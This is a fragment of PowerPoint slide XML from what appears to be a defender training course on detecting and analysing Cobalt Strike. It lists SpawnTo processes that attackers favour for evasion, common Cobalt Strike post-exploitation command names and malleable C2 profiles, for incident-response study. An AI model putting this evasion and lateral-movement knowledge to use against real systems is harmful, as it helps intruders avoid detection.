            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You Haz Profiles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{997DF3E7-CE66-4938-B4A1-48C771B474E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639024" y="1556240"/>
            <a:ext cx="9321840" cy="4340567"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>We have cloned BC Security’s “Malleable-C2-Profiles” repo for you</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>To view contents, run:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ls * ~/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malware_analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/Malleable-C2-Profiles.git/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42118918-85AB-7E22-0DD8-4EB088CAC88D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="359920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F648-0538-47B4-B0FF-0D346F4C0F7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SpawnTo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Process Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Content Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8FB0F87-4B69-EBCD-E1B3-F28423E7379E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639024" y="1556240"/>
            <a:ext cx="10175514" cy="4755660"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TAs LOVE the default </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SpawnTo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> process of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>rundll32.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (lame)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Savvy actors change this value, making our job in IR more difficult</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Q3/Q4 2021 BlackBerry analysis found these as the Top 5:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rundll32.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gpupdate.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dllhost.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mstsc.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wusa.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>for528.com/cs-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>spawnto</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC9900"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId3">
                <a:extLst>
                  <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                    <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                  </a:ext>
                </a:extLst>
              </a:hlinkClick>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>twitter.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>cobaltstrikebot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{839E0857-D38C-450F-B08E-7495B9F2A9C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11537950" y="6311900"/>
            <a:ext cx="654050" cy="546100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{6393D41B-4110-4B61-8CE8-CE846C38989A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D15140BA-B970-EFF1-4330-AD7863D426BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5726781" y="3621024"/>
            <a:ext cx="4752601" cy="2963926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="50056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A6F070-3635-4AEB-873C-7456F349F557}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="778363" y="2142183"/>
            <a:ext cx="10036175" cy="3939200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F186F6BD-6580-464A-9925-A8D726E7FB3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ongoing Game of Whack-a-Mole</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C06A4F0A-4344-1A4B-D895-FC9D56099E65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CS users often try to subvert detection </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B432EF2-8383-47B4-AFD0-BF8F80675063}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11537950" y="6311900"/>
            <a:ext cx="654050" cy="546100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{6393D41B-4110-4B61-8CE8-CE846C38989A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31889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E70B-7AF4-4EC6-AF85-357CB64A8EAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>CobaltStrike</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF8F4619-A1B7-4E9C-AEE9-2E061EA6D928}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639024" y="1556240"/>
            <a:ext cx="8273328" cy="4340567"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The most common command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> invokes a shell command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some common CS commands you’ll see:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>powershell</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powerpick</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psinject</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powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-import</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>psexec_psh</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winrm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wmi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">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B1DFEE2F-3984-5065-5623-E1B730B6ABDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="0" cy="0"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6393D41B-4110-4B61-8CE8-CE846C38989A}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="404775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CC28B-E654-7EB7-4917-D99FFC9969DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cobalt Strike Detection &amp; Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Content Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D457542-A5DE-902D-9CA3-99FFB39C233D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Let’s get to the hands-on part!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="822960" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Want to learn more? Check out The DFIR Report!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Cobalt Strike, a Defender’s Guide Part 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Cobalt Strike, a Defender’s Guide Part 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>for528.com/dfirreport-cs1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> dfirreport-cs2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2FC9E7F-9938-7C20-D736-7EE5695D9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278" y="4114141"/>
            <a:ext cx="4348163" cy="21710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EDBB21-7864-4437-402F-D23D6BAD890F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3921919" y="6298085"/>
            <a:ext cx="4114882" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Meme credit to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>The DFIR Report, 2022</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="991967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5F3CEF1A-1C0F-852F-7570-AF6268D2F9B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639024" y="164133"/>
            <a:ext cx="10175514" cy="922137"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It’s Dangerous to Go Alone!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Take These CS Payload Parsers!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAAD65E6-0EF5-F626-0A06-24C590513B45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Table 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D536B162-066B-49ED-B2FE-ACD9C7002724}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3084047787"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="422036" y="1517090"/>
          <a:ext cx="11371384" cy="4765592"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{21E4AEA4-8DFA-4A89-87EB-49C32662AFE0}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="5095306">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2276529223"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6276078">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2426178182"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="622900">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1700" b="1" cap="none" spc="150" baseline="0" dirty="0">
                          <a:solidFill>
